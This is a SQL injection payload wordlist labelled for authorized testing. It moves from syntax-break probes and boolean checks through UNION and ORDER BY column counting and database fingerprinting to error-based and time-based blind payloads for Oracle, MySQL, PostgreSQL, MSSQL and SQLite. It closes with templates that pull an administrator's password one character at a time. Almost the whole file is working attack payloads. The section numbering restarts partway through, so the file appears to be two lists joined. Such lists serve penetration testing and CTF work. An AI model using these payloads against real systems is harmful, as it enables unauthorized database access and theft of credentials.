# =====================================================
# SQLi DETECTION + CONFIRMATION WORDLIST
# Authorized testing only: own labs, CTFs, in-scope bug bounty assets.
# Order: bare probes -> boolean confirm (all comment variants) -> numeric -> column count
# =====================================================

## 1. BARE SYNTAX-BREAK PROBES
'
''
"
""
`
')
")
`)
'))
"))
\
%27
%22

## 2. BOOLEAN CONFIRM — single quote, all comment variants
' AND '1'='1
' AND '1'='2
' OR '1'='1
' OR '1'='2
' AND 1=1
' AND 1=2
' OR 1=1
' OR 1=2
' AND 1=1--
' AND 1=1-- -
' AND 1=1#
' AND 1=1/**/
' AND 1=1-- 
' AND 1=1;--
' AND 1=1`
' AND 1=2--
' AND 1=2-- -
' AND 1=2#
' AND 1=2/**/
' AND 1=2-- 
' AND 1=2;--
' AND 1=2`
' OR 1=1--
' OR 1=1-- -
' OR 1=1#
' OR 1=1/**/
' OR 1=1-- 
' OR 1=1;--
' OR 1=1`
' OR 1=2--
' OR 1=2-- -
' OR 1=2#
' OR 1=2/**/
' OR 1=2-- 
' OR 1=2;--
' OR 1=2`

## 3. BOOLEAN CONFIRM — double quote, all comment variants
" AND "1"="1
" AND "1"="2
" OR "1"="1
" OR "1"="2
" AND 1=1--
" AND 1=1-- -
" AND 1=1#
" AND 1=1/**/
" AND 1=1-- 
" AND 1=1;--
" AND 1=1`
" AND 1=2--
" AND 1=2-- -
" AND 1=2#
" AND 1=2/**/
" AND 1=2-- 
" AND 1=2;--
" AND 1=2`
" OR 1=1--
" OR 1=1-- -
" OR 1=1#
" OR 1=1/**/
" OR 1=1-- 
" OR 1=1;--
" OR 1=1`
" OR 1=2--
" OR 1=2-- -
" OR 1=2#
" OR 1=2/**/
" OR 1=2-- 
" OR 1=2;--
" OR 1=2`

## 4. BOOLEAN CONFIRM — bracket-close contexts, all comment variants
') AND 1=1--
') AND 1=1-- -
') AND 1=1#
') AND 1=1/**/
') AND 1=1-- 
') AND 1=1;--
') AND 1=1`
') AND 1=2--
') AND 1=2-- -
') AND 1=2#
') AND 1=2/**/
') AND 1=2-- 
') AND 1=2;--
') AND 1=2`
') OR 1=1--
') OR 1=1-- -
') OR 1=1#
') OR 1=1/**/
') OR 1=1-- 
') OR 1=1;--
') OR 1=1`
') OR 1=2--
') OR 1=2-- -
') OR 1=2#
') OR 1=2/**/
') OR 1=2-- 
') OR 1=2;--
') OR 1=2`
") AND 1=1--
") AND 1=1-- -
") AND 1=1#
") AND 1=1/**/
") AND 1=1-- 
") AND 1=1;--
") AND 1=1`
") AND 1=2--
") AND 1=2-- -
") AND 1=2#
") AND 1=2/**/
") AND 1=2-- 
") AND 1=2;--
") AND 1=2`
") OR 1=1--
") OR 1=1-- -
") OR 1=1#
") OR 1=1/**/
") OR 1=1-- 
") OR 1=1;--
") OR 1=1`
") OR 1=2--
") OR 1=2-- -
") OR 1=2#
") OR 1=2/**/
") OR 1=2-- 
") OR 1=2;--
") OR 1=2`

## 5. NUMERIC CONTEXT (no quotes)
1
2-1
1 AND 1=1
1 AND 1=2
1 OR 1=1
1 OR 1=2
1 AND 1=1--
1 AND 1=1-- -
1 AND 1=1#
1 AND 1=1/**/
1 AND 1=1-- 
1 AND 1=1;--
1 AND 1=1`
1 AND 1=2--
1 AND 1=2-- -
1 AND 1=2#
1 AND 1=2/**/
1 AND 1=2-- 
1 AND 1=2;--
1 AND 1=2`
1 OR 1=1--
1 OR 1=1-- -
1 OR 1=1#
1 OR 1=1/**/
1 OR 1=1-- 
1 OR 1=1;--
1 OR 1=1`
1 OR 1=2--
1 OR 1=2-- -
1 OR 1=2#
1 OR 1=2/**/
1 OR 1=2-- 
1 OR 1=2;--
1 OR 1=2`

## 6. COLUMN COUNT — UNION NULL ladder 1..20 (generic --)
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--

## 7. COLUMN COUNT — ORDER BY 1..20
' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--
' ORDER BY 4--
' ORDER BY 5--
' ORDER BY 6--
' ORDER BY 7--
' ORDER BY 8--
' ORDER BY 9--
' ORDER BY 10--
' ORDER BY 11--
' ORDER BY 12--
' ORDER BY 13--
' ORDER BY 14--
' ORDER BY 15--
' ORDER BY 16--
' ORDER BY 17--
' ORDER BY 18--
' ORDER BY 19--
' ORDER BY 20--

## 8. QUOTE-PAIR CONFIRMATION
'
''
"
""

## 9. CONCAT SYNTAX PROBES — single quote
'||(SELECT '')||'
'||(SELECT '' FROM dual)||'
'+(SELECT '')+'
' (SELECT '')
'||(SELECT '' FROM sqlite_master)||'
CONCAT('','')

## 9b. CONCAT SYNTAX PROBES — double quote
"||(SELECT "")||"
"||(SELECT "" FROM dual)||"
"+(SELECT "")+"
" (SELECT "")
"||(SELECT "" FROM sqlite_master)||"

## 10. FINGERPRINT PAIR — dual vs no-dual
'||(SELECT '')||'
'||(SELECT '' FROM dual)||'

## 11. VALID vs INVALID TABLE
'||(SELECT '' FROM dual)||'
'||(SELECT '' FROM not_a_real_table)||'
'||(SELECT '' FROM users WHERE ROWNUM=1)||'

## 12. VERSION FINGERPRINTS — single quote
'||(SELECT banner FROM v$version WHERE ROWNUM=1)||'
'||(SELECT version())||'
'+@@version+'
'+CONCAT(@@version)+'
'||(SELECT sqlite_version())||'

## 12b. VERSION FINGERPRINTS — double quote
"||(SELECT banner FROM v$version WHERE ROWNUM=1)||"
"||(SELECT version())||"
"+@@version+"
"||(SELECT sqlite_version())||"

## 13. MySQL-SPECIFIC
' AND (SELECT @@version) IS NOT NULL-- -
' AND (SELECT 1 FROM dual WHERE 1=1)-- -
' AND extractvalue(1,concat(0x7e,version()))-- -
' AND (SELECT CONCAT('a','b'))='ab'-- -

## 14. CONDITIONAL ERROR — Oracle (single quote)
'||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'
'||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||'

## 14. CONDITIONAL ERROR — PostgreSQL (single quote)
'||(SELECT CASE WHEN (1=1) THEN CAST(1/0 AS int) ELSE '' END)||'
'||(SELECT CASE WHEN (1=2) THEN CAST(1/0 AS int) ELSE '' END)||'

## 14. CONDITIONAL ERROR — MSSQL (single quote)
'+(SELECT CASE WHEN (1=1) THEN 1/0 ELSE '' END)+'
'+(SELECT CASE WHEN (1=2) THEN 1/0 ELSE '' END)+'

## 14. CONDITIONAL ERROR — MySQL
' AND (SELECT CASE WHEN (1=1) THEN (SELECT 1 UNION SELECT 2) ELSE 1 END)-- -
' AND (SELECT CASE WHEN (1=2) THEN (SELECT 1 UNION SELECT 2) ELSE 1 END)-- -
' AND extractvalue(1,CASE WHEN (1=1) THEN concat(0x7e,1) ELSE 1 END)-- -

## 14. CONDITIONAL ERROR — double quote mirrors
"||(SELECT CASE WHEN (1=1) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||"
"||(SELECT CASE WHEN (1=2) THEN TO_CHAR(1/0) ELSE '' END FROM dual)||"
"||(SELECT CASE WHEN (1=1) THEN CAST(1/0 AS int) ELSE '' END)||"
"||(SELECT CASE WHEN (1=2) THEN CAST(1/0 AS int) ELSE '' END)||"
"+(SELECT CASE WHEN (1=1) THEN 1/0 ELSE '' END)+"
"+(SELECT CASE WHEN (1=2) THEN 1/0 ELSE '' END)+"

## 15. EXTRACTION TEMPLATES ({1} = generated condition)
'||(SELECT CASE WHEN ({1}) THEN TO_CHAR(1/0) ELSE '' END FROM users WHERE username='administrator')||'
'||(SELECT CASE WHEN ({1}) THEN CAST(1/0 AS int) ELSE '' END FROM users WHERE username='administrator')||'
'+(SELECT CASE WHEN ({1}) THEN 1/0 ELSE '' END FROM users WHERE username='administrator')+'

## 0. BASELINE (should NOT delay — anchors normal response time)
'||(SELECT '')||'

## 1. ORACLE  (primary suspect: dual / v$version / ROWNUM seen)
# heavy-query delay (works without special privs)
'||(SELECT CASE WHEN (1=1) THEN (SELECT count(*) FROM all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) ELSE '' END FROM dual)||'
'||(SELECT CASE WHEN (1=2) THEN (SELECT count(*) FROM all_users t1,all_users t2,all_users t3,all_users t4,all_users t5) ELSE '' END FROM dual)||'
# dbms_pipe.receive_message (clean 5s, often available)
'||(SELECT CASE WHEN (1=1) THEN dbms_pipe.receive_message('a',5) ELSE '' END FROM dual)||'
'||(SELECT CASE WHEN (1=2) THEN dbms_pipe.receive_message('a',5) ELSE '' END FROM dual)||'

## 2. MYSQL / MariaDB
'||(SELECT SLEEP(5))||'
'+(SELECT SLEEP(5))+'
' AND (SELECT 1 FROM (SELECT SLEEP(5))x)-- -
' AND IF(1=1,SLEEP(5),0)-- -
' AND IF(1=2,SLEEP(5),0)-- -
'||(SELECT IF(1=1,SLEEP(5),0))||'
'||(SELECT IF(1=2,SLEEP(5),0))||'

## 3. POSTGRESQL
'||(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)||'
'||(SELECT CASE WHEN (1=2) THEN pg_sleep(5) ELSE pg_sleep(0) END)||'
' AND (SELECT 1 FROM pg_sleep(5))IS NOT NULL-- -
'; SELECT pg_sleep(5)-- -

## 4. MSSQL (SQL Server)
'; IF (1=1) WAITFOR DELAY '0:0:5'-- -
'; IF (1=2) WAITFOR DELAY '0:0:5'-- -
' WAITFOR DELAY '0:0:5'-- -
'+(SELECT CASE WHEN (1=1) THEN '' ELSE '' END)+'; WAITFOR DELAY '0:0:5'-- -

## 5. SQLITE  (no native sleep; use heavy randomblob to force CPU delay)
'||(SELECT CASE WHEN (1=1) THEN (SELECT count(*) FROM (SELECT 1 UNION SELECT 2),(SELECT 1 UNION SELECT 2)) AND randomblob(100000000) ELSE '' END)||'
'||(SELECT CASE WHEN (1=1) THEN hex(randomblob(100000000)) ELSE '' END)||'
'||(SELECT CASE WHEN (1=2) THEN hex(randomblob(100000000)) ELSE '' END)||'

## 6. EXPLOITATION TEMPLATE — once engine identified, swap {COND} for a real test
#    e.g. {COND} = (SELECT substr(password,1,1) FROM users WHERE username='administrator')='a'
#    Oracle:
'||(SELECT CASE WHEN ({COND}) THEN dbms_pipe.receive_message('a',5) ELSE '' END FROM dual)||'
#    MySQL:
' AND IF(({COND}),SLEEP(5),0)-- -
#    Postgres:
'||(SELECT CASE WHEN ({COND}) THEN pg_sleep(5) ELSE pg_sleep(0) END)||'
#    MSSQL:
'; IF ({COND}) WAITFOR DELAY '0:0:5'-- -
